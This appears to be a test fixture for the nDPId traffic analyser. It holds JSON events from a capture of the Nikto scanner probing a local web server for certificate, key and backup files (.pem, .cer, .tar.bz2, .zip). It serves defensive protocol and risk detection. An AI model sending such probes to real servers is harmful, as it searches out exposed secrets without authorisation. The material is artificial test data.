-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 